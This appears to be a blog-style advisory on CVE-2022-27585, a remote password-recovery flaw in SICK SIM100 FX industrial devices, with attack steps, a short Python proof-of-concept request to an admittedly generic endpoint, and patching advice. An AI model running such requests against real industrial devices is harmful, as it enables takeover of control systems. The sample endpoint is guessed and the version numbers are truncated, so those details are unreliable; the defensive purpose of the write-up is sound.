CVE-2022-27585 - Remote Password Recovery Vulnerability in SICK SIM100 FX (<1.6.) – Easy Privilege Escalation Exploit Explained

In industrial automation, security holes can have massive impacts on businesses and safety. Today, we will walk you through a serious vulnerability tracked as CVE-2022-27585, affecting SICK SIM100 FX devices with firmware versions earlier than 1.6. (Part numbers 1097816 and 1097817). This bug lets an unauthenticated attacker remotely recover passwords and elevate privileges by abusing the built-in recovery function—no advanced hacking skills needed.

In this post, you’ll learn how the exploit works, see code snippets, and get advice on how to patch your system. This explanation is in simple language for everyone to understand. For official details, check out the SICK security advisory.

What's the Vulnerability?

CVE-2022-27585 is a flaw in the password recovery mechanism of SICK SIM100 FX devices running firmware below version 1.6.. The system allows *anyone* on the network to invoke the password recovery method—no login needed. This means remote attackers can reset/recover access to accounts that should require higher privileges, like “RecoverableUserLevel”, and then gain unauthorized control of the device.

Risk: The attacker gains the level of access defined by RecoverableUserLevel, allowing changes to the configuration, data extraction, or even disabling/manipulating the system. This can disrupt operations and poses danger if your setup is part of a critical process.

Summary Table

| Impacted Products       | Firmware Versions      | Fixed in (>=)      |
|------------------------|-----------------------|--------------------|
| SICK SIM100 FX (1097816, 1097817) | < 1.6.              | 1.6.              |

How Does the Attack Work?

The problem is that the password recovery functionality (intended for legitimate users who forgot their passwords) can be triggered remotely by anyone. Hackers can script access to this functionality using the exposed API or web interfaces.

Step-by-step

1. Find the Device: The attacker locates accessible SICK SIM100 FX devices, e.g., via Shodan or by scanning network ranges.
2. Invoke Password Recovery: Without authentication, attacker sends a crafted HTTP request to the password recovery endpoint.
3. Obtain or Reset Password: The device gives the attacker either a reset password or a way to recover it—for whatever account is set as RecoverableUserLevel.

Proof-of-Concept Exploit

Let’s see a sample Python snippet that could be used by attackers to trigger the vulnerability (modify with the real endpoint):

import requests

# Target SICK SIM100 FX device IP
target_ip = "192.168.1.100"  # Example IP
url = f"http://{target_ip}/api/password-recovery";

# Example payload - real details from device should be adjusted
payload = {
    "username": "admin"  # or the default RecoverableUserLevel
}

resp = requests.post(url, json=payload)
if resp.status_code == 200:
    print(f"[+] Password Recovery Data: {resp.json()}")
else:
    print(f"[-] Failed: {resp.status_code}")

*Note*: This is a generic example! The actual endpoint, parameters, and response will vary by device and configuration, but this illustrates the lack of authentication.

Steal Sensitive Data: Extract logs, credentials, or other operational info.

- Disrupt Operations: Disable device outcomes, induce failures, or launch further attacks into the network.
- Repeat Attack: Since the flaw is deterministic, attackers can repeatedly exploit unpatched devices.

Upgrade the firmware to version 1.6. or later.

- Get the latest firmware from the SICK Support Portal.
- If you can’t upgrade right away, secure network access to the device: use VPNs, firewalls, or air-gapping.

Link to Official Advisory:

- SICK Product Security Advisory – CVE-2022-27585

Good Practice:

- Disable unused accounts/levels if possible.

Conclusion

CVE-2022-27585 is a critical security bug in SICK SIM100 FX devices that allows anyone remote access to the password recovery function, making privilege escalation trivial. If you use these devices, upgrade your firmware to 1.6. or later immediately and restrict access wherever possible. This issue is easily exploitable and likely to be targeted in automated attacks.

Stay safe!

*For more technical details or help, check the vendor documentation or reach out to your SICK support contact.*

Reference Links

- SICK Security Portal
- CVE Details: CVE-2022-27585


*You are welcome to share this post to alert others in your organization or network.*

Timeline

Published on: 11/01/2022 21:15:00 UTC
Last modified on: 03/31/2023 16:06:00 UTC